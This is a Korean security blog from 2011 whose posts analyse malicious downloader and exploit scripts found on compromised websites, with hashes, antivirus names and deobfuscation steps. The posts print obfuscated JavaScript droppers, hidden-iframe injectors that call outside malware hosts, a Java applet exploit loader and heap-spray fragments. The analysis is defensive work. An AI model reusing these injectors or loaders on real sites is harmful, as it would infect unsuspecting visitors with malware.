posted by Kwan's 2011. 12. 10. 02:36

 

File : CAA7EF2L ,CAA7EF2L.(숨김파일)
MD5 : 87514e109381faa98b50f426dd37f015  CAA7EF2L
MD5 : 87514e109381faa98b50f426dd37f015  CAA7EF2L. (숨김파일)
크기 :
88.6KB (90,752 바이트)
        88.6KB (90,752 바이트) (숨김파일)
감염 사이트 :
http://alyackorea.com/download.php?n=kakao_theme_2.X.0.exe
Kaspersky : HEUR:Trojan-Downloader.Win32.Generic

VirusTotal :

http://www.virustotal.com/file-scan/report.html?id=b8aed1eac332adada69d7725614442ec14bab7f30b7069f56a598698a030e2e8-1323448834


alyackorea.com 사이트 접속시 한 P2P 사이트로 넘어 갑니다 !




http://alyackorea.com/download.php?n=kakao_theme_2.X.0.exe 

해당 프로그램 다운로드시 !


이런 프로그램이 다운되어서 실행이 됩니다. 해당 파일을 실행시  WizPop , EASYON , FINETOP 등
프로그램이 실행 및 설치 됩니다.


 



삭제 방법은 울지않는 벌새 블로그

 :
검색 도우미 : 위즈팝(WizPop)
   http://hummingbird.tistory.com/2350 참고 하시면 될꺼 같습니다!

여기를 확인 하시면 도움이 될꺼라고 생각합니다!

파일명으로 판단하지마시고 다시한번 공식 사이트를 확인하셔서 한번 더 확인하고 받으면 안전할꺼라고 생각합니다.

공식 알약 사이트 : http://alyac.altools.co.kr/Main/Default.aspx

댓글을 달아 주세요

posted by Kwan's 2011. 12. 10. 01:04

File :

java.html
MD5 :  66a3a0be5fc181f1a9379a9a696c0928
크기 : 2.98KB (3,058 바이트)
감염 사이트 : http://78xxk.com/java.html
Kaspersky : Trojan-Downloader.JS.Agent.gm
VirusTotal :
http://www.virustotal.com/file-scan/report.html?id=0b1b210aaeb0adf9999cb0dd1144b5bdfe8aa377929a66b691444ba69368e82e-1323445327

function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array( 생략 );
function nbcode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function nbshine(str,key){if(str==""){return "";}
z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="GhSI6ogoUBDNPP0jfVLuz4Hm6Ei+7aoM3CEe17FSeZKBW0L1ZllNuhB6
/ShcPzCYCLruc/생략/RlPelzXHnJN";
t=utf8to16(nbshine(nbcode(t), '\x31\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65\x66'));window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](t);

<html>
   <head></head>
   <body>
     <applet archive="apple.jpg" code="ScriptEngineExp.class"
width="1" height="1">
       <param name="data" value="http://208.53.158.1xx/9.exe>
     </applet>
  </body>
 </html>

apple.jpg (application/zip) ~> apple.zip


b8a1deb8ac5a7b0572a0601331d2ba4b  .classpath
e9a411939cd3ef76528685541ae69709  .project
5127569b4f83d8b42d9f2f20eecdc300  ScriptEngineExp.class
92d04d6bd8a0235843240bba30d2f091  MANIFEST.MF


댓글을 달아 주세요

posted by Kwan's 2011. 11. 19. 20:46

* 네이버 어느 페이지에서 감염되었는지는 모르겠다는걸 알려 드립니다!

최초 진단 사이트 : HEUR:Trojan.Script.Iframer (카스퍼스키)

링크 : http://n37.nsmartad.com/imp?slot=3451&ads=57314&tid=1&type=as

document.write("OK");
var info=navigator.userAgent.toLowerCase();var August=info.indexOf("windows nt 5.1");if(document.cookie.indexOf('veatpr')==-1&&August>0){var expires=new Date();expires.setTime(expires.getTime()+24*60*30*1000);document.cookie='veatpr=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70% 생 략 %65%3E"));}

OK
var info=navigator.userAgent.toLowerCase();var August=info.indexOf("windows nt 5.1");if(document.cookie.indexOf('veatpr')==-1&&August>0){var expires=new Date();expires.setTime(expires.getTime()+24*60*30*1000);document.cookie='veatpr=Yes;path=/;expires='+expires.toGMTString();<iframe src= http://wap.helloshop.ixfx/a18/my.html ?cdkey width=25 height=0></iframe>}

my.html 하위 사이트 연결 !!


fun.htm?莖폭渡괩1119

HEX :
687474703A2F2F3132312E37382E3134372E3137352F4167732F4147532E676966

http://121.78.147.175/Ags/AGS.gXf ~> 최종파일

new.html?劤壙젬꺄1119


 var January="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+
 "<object width=\"550\" height=\"400\">\r\n"+
 "<param name=\"movie\" value=\"done.swf\">\r\n"+
 "<embed src=\" Birthday.swf \" width=\"550\" height=\"400\">\r\n"+
 "<\/embed>\r\n"+
 "<\/object>"

댓글을 달아 주세요

  1. 물여우 2011.11.19 22:32 신고  Addr  Edit/Del  Reply

    네이버 어딘지 찾기 정말 어렵네요.
    그나저나 휴가 때마다 분석이시라니 대단하십니다!!
    추운데 감기 조심하세요~ ^^

  2. milaero 2011.11.20 00:19 신고  Addr  Edit/Del  Reply

    진짜 시간날때마다 분석하시다니.. 수고하십니다 :)

posted by Kwan's 2011. 10. 22. 12:19

File :

f1.html
MD5 :  bce75d05869be9fdf489d13630bab1f1
크기 : 8.67KB (8,879 바이트)
감염 사이트 : http://toto888.gnway.net:8080/xxx/f1.html
Kaspersky : Exploit.JS.Agent.akr
VirusTotal :
http://www.virustotal.com/file-scan/report.html?id=f811ce7544059f8123fdf5199e2abb29e8f4508dc9b58a761185779d96de2c12-1319253379
 
원본 코드

var a1 = "ABCDEFG";
var a2 = "HIJKLMNOP";
var a3 = "QRSTUVWXYZabcdef";
var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";
function mydata(input){
 var output="";
 var chr1,chr2,chr3="";
 var enc1,enc2,enc3,enc4="";
 var i=0;
 var base64test=/[^A-Za-z0-9\+\/\=]/g;
 input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");
 do{
  enc1=keyStrs.indexOf(input.charAt(i++));
  enc2=keyStrs.indexOf(input.charAt(i++));
  enc3=keyStrs.indexOf(input.charAt(i++));
  enc4=keyStrs.indexOf(input.charAt(i++));
  chr1=(enc1<<2)|(enc2>>4);
  chr2=((enc2&15)<<4)|(enc3>>2);
  chr3=((enc3&3)<<6)|enc4;
  output=output+String.fromCharCode(chr1);
  if(enc3!=64){output=output+String.fromCharCode(chr2);};
  if(enc4!=64){output=output+String.fromCharCode(chr3);};
  chr1=chr2=chr3="";
  enc1=enc2=enc3=enc4="";
 };
 while(i<input.length);return output;
 };
KT="2000 / 25 ,3905 / 55 ,60 - 3 ,106 - 1 ,189 - 92 ,206 - 97 ,31 + 55 ,19 + 87 ,1700 / 17 ,2211 / 33 ,117 - 51 ,114 - 8 ,44 + 54 ,39 + 32 ,52 + 18 ,173 - 51 ,96 + 3 ,85 - 35 ,137 - 29 ,4494 / 42 ,138 - 58 ,154 - 71 ,16 + 58 ,2438 / 23 ,6076 / 62 ,1368 / 19 ,14 + 64 ,224 - 112 ,28 + 62 ,6 + 62 ,9072 / 81 ,158 - 51 ,3003 / 39 ,193 - 87 ,8500 / 85 ,209 - 103 ,48 + 
[중간코드 생략] / 61 ,2670 / 30 ,7482 / 86 ,186 - 78 ,10296 / 88 ,5183 / 71 ,735 / 7 ,3510 / 54 ,4366 / 37 ,18 + 62 ,171 - 68 ,1632 / 34 ,88 - 13 ,131 - 51 ,91 - 24 ,3078 / 54 ,6726 / 57 ,153 - 64 ,57 + 52 ,94 + 18 ,126 - 18 ,96 - 7 ,96 - 45 ,405 / 5 ,65 - 22 ";
t=eval("mydata(String.fromCharCode("+KT+"))");
document.write(t);

Eavl 함수 실행 후

mydata(String.fromCharCode(="2000 / 25 ,3905 / 55 ,60 - 3 ,106 - 1 ,189 - 92 ,206 - 97 ,31 + 55 ,19 + 87 ,1700 / 17 ,2211 / 33 ,117 - 51 ,114 - 8 ,44 + 54 ,39 + 32 ,52 + 18 ,173 - 51 ,96 + 3 ,85 - 35 ,137 - 29 ,4494 / 42 ,138 - 58 ,154 - 71 ,16 + 58 ,2438 / 23 ,6076 / 62 ,1368 / 19 ,14 + 64 ,224 - 112 ,28 + 62 ,6 + 62 ,9072 / 81 ,158 - 51 ,3003 / 39 ,193 - 87 ,8500 / 85 ,209 - 103 ,48 + 
[중간코드 생략] / 61 ,2670 / 30 ,7482 / 86 ,186 - 78 ,10296 / 88 ,5183 / 71 ,735 / 7 ,3510 / 54 ,4366 / 37 ,18 + 62 ,171 - 68 ,1632 / 34 ,88 - 13 ,131 - 51 ,91 - 24 ,3078 / 54 ,6726 / 57 ,153 - 64 ,57 + 52 ,94 + 18 ,126 - 18 ,96 - 7 ,96 - 45 ,405 / 5 ,65 - 22 ";)


mydata ~> Alert 변경후 실행 !

---------------------------
Microsoft Internet Explorer
---------------------------
PG9iamVjdCBjbGFzc2lkPSJjbHNpZDpkMjdjZGI2ZS1hZTZkLTExY2YtOTZiO
C00NDQ1NTM1NDAwMDAiIA0Kd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMDAiIGlkP
SJ0ZXN0IiBhbGlnbj0ibWlkZGxlIj4NCjxwYXJhbSBuYW1lPSJtb3ZpZSIgdmFs
[중간코드 생략]bHVlPSJ0cnVlIiAvPg0KPHBhcmFtIG5hbWU9ImRldmljZWZvbnQiIHZhbHVlPSJ
mYWxzZSIgLz4NCjxwYXJhbSBuYW1lPSJzYWxpZ24iIHZhbHVlPSIiIC8+DQo8
cGFyYW0gbmFtZT0iYWxsb3dTY3JpcHRBY2Nlc3MiIHZhbHVlPSJzYW1lRG9tY
WluIiAvPg0KPC9vYmplY3Q+
---------------------------
확인  
---------------------------


Decode Base 64

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
width="200" height="100" id="test" align="middle">
<param name="movie" value="happ.swf?
info=02E631B5B1353336AB51D3527B7A6FAE7986" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="play" value="true" />
<param name="loop" value="true" />
<param name="wmode" value="window" />
<param name="scale" value="showall" />
<param name="menu" value="true" />
<param name="devicefont" value="false" />
<param name="salign" value="" />
<param name="allowScriptAccess" value="sameDomain" />
</object>

댓글을 달아 주세요

posted by Kwan's 2011. 9. 23. 13:01

File :

rst46815.htm
MD5 :  52060d2944fa64d564f0ac4dfbd83c56
크기 : 3.71KB (3,806 바이트)
감염 사이트 : http://bydbest.com/xxx/rst46815.htm
Kaspersky : Trojan-Downloader.JS.Iframe.ciq
 
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" " 생략 ">
 <html xmlns=" 생략 ">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
 <title>Untitled Document</title>
 </head>
 <body><a href=" 생략 " target="_blank">Free dating, Friendship, sms</a>
 </body>
 
<!-- . --><script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("ev"+"al");
 e=window[aa.nodeValue];
 e(String.fromCharCode

(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,
118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,
68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,
123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,
99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,
103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,
(중간 코드 생략),11+o,102+o,113+o,101+o,119+o,111+o,103+o,
(중간 코드 생략),11+o,11+o,127+o));
 
</script><!-- . --> </html>
 

[Script 해독]

if (document.getElementsByTagName('body')[0]){
  iframer();
}
else {
  document.write("
<iframe src='http://neotraff.xx.xx/in.cgi?default' width='10' height='10' style='visibilit
y:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://neotraff.xx.xx/in.cgi?default');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}


[연결 되는 URL]

http://neotraff.xx.xx/in.cgi?default

[VirusTotal 결과]

http://www.virustotal.com/file-scan/report.html?id=025e13abacdf118eb22bf889fce543ce02e6a97c2d4753ca685d1fa00cd9246c-1316749355

MD5   : 52060d2944fa64d564f0ac4dfbd83c56
SHA1  : 857d18e3000994379d82b632c7d25c2dedf9478d
SHA256: 025e13abacdf118eb22bf889fce543ce02e6a97c2d4753ca685d1fa00cd9246c

댓글을 달아 주세요

posted by Kwan's 2011. 7. 27. 18:38

제가 본 한 중국 사이트의 악성 스크립트 입니다 !

<script src='party.css'></script>

IE 버전을 확인한 이후에 위와 같은 스크립트에 연결 시켜 감염을 합니다 !

party.css 볼까요

var hua, hua1, hua2, hua3, hua4;

hua='\x25';    var kao='\x25';   var shit='\x25'; var jj=hua+'u'+'4B5B';  var cao='\x25';
 hua1='u';     kao+='u';    shit+='u';  var kk=hua+'u'+'CD36';  cao+='u';
hua2='58';    kao+='B';    shit+='B';  var ll=hua+'u'+'BD8F';  cao+='B';
 hua3=hua+hua1+'5';    kao+='D';    shit+='D';  var mm=hua+'u'+'E9D0';  cao+='DD';
hua4=hua3+'8'+'58%'+hua1+hua2+hua2; kao+='BC';       shit+='B';shit+='D'; var oo=hua+'u'+'FB7A';  cao+='7';

 var org='u2355%uBDBF%'+'u';
oah+='BDBC%u36BD%uD755%uE4B8%'+org+'5FBD%uD544%uD3D2'+shit+'%';

[중간 코드 생략]

oah+='4D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%u';

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

짧막하게 한번 코드를 간추려서 써보았습니다.

첫번째 빨간색으로 되어있는 코드는 그대로 따라가주면 됩니다 !
여기서
\x25' 는 %25로서 % 을 의미 합니다.

두번째는 var org 로서 되어있는 코드를 모아 봅니다!
이번 스트립트는... var org1 부터 var org12 까지 모아져 있습니다.

그걸 전부 합치면 최종 코드가 짜잔 나옵니다....
이런건 노가다기 때문에 패쓰 합니다...

마지막 코드는

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

마지막이 역시 제일 중요합니다.
최종 파일을 쉽게 나오게 할 수 있는 힌트 입니다.

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

마지막인 코드를 들여다 보면 곧바로 최종파일 바로 받을 수 있습니다.

AHWM라는걸 본다면 쉽게풀수 있습니다.

AHWM%u로 바꿔 줍니다.

%uADB7%u3Dbd3%u8d92%u[중간코드 생략]8c8f%ude93%ucece%ubdbd
이런식으로 접근하게 됩니다.

이와 같이

 


다시 Hex View 로 가서 디코딩을 한번 더 해주면 최종 파일에 접근 할 수 있습니다.

 



이와 같이 멀질라를 이용해서 파악만 하면 쉽게 최종 파일에 접근 할 수 있습니다.

최종 파일 : http://www.jx2xbxxx.com/dxf/021.css

바이러스 토탈 :

http://www.virustotal.com/file-scan/report.html?id=6a179b8d9d3837fa1ecc4b2331959631519e8216f85f1f7ee2e5b844d8d1980a-1311758547

댓글을 달아 주세요